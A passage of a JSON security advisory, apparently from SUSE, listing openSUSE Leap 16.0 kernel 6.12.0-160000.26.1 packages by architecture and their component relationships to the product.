"category": "product_version",
"name": "kernel-syms-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-syms-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-syms-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"product_id": "kselftests-kmp-azure-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"product_id": "kselftests-kmp-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"product_id": "kselftests-kmp-rt-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"product": {
"name": "ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"product_id": "ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"product_id": "ocfs2-kmp-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"product": {
"name": "ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"product_id": "ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Leap 16.0",
"product": {
"name": "openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0"
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64"
},
"product_reference": "cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64"
},
"product_reference": "cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64"
},
"product_reference": "cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64"
},
"product_reference": "cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x"
},
"product_reference": "cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64"
},
"product_reference": "cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64"
},
"product_reference": "cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-64kb-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-azure-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-azure-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64"
},
"product_reference": "dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x"
},
"product_reference": "dlm-kmp-default-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-rt-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-rt-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64"
},
"product_reference": "dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-allwinner-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-allwinner-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-altera-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-altera-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-amazon-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-amazon-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-amd-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-amd-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-amlogic-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-amlogic-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-apm-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-apm-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-apple-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-apple-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-arm-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-arm-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-broadcom-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-broadcom-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-cavium-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-cavium-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-exynos-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-exynos-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-freescale-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-freescale-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-hisilicon-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-lg-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-lg-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-marvell-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-marvell-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-mediatek-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-mediatek-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-nvidia-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-nvidia-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-qcom-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-qcom-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-renesas-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-renesas-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-rockchip-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-rockchip-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-socionext-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-socionext-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-sprd-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-sprd-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dtb-xilinx-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64"
},
"product_reference": "dtb-xilinx-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64"
},
"product_reference": "gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-azure-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64"
},
"product_reference": "gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-azure-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64"
},
"product_reference": "gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64"
},
"product_reference": "gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x"
},
"product_reference": "gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-rt-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64"
},
"product_reference": "gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-rt-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
},
"product_reference": "gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-64kb-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-extra-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-optional-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-azure-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-devel-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-devel-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-extra-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-extra-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-optional-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-optional-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-vdso-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64"
},
"product_reference": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le"
},
"product_reference": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64"
},
"product_reference": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
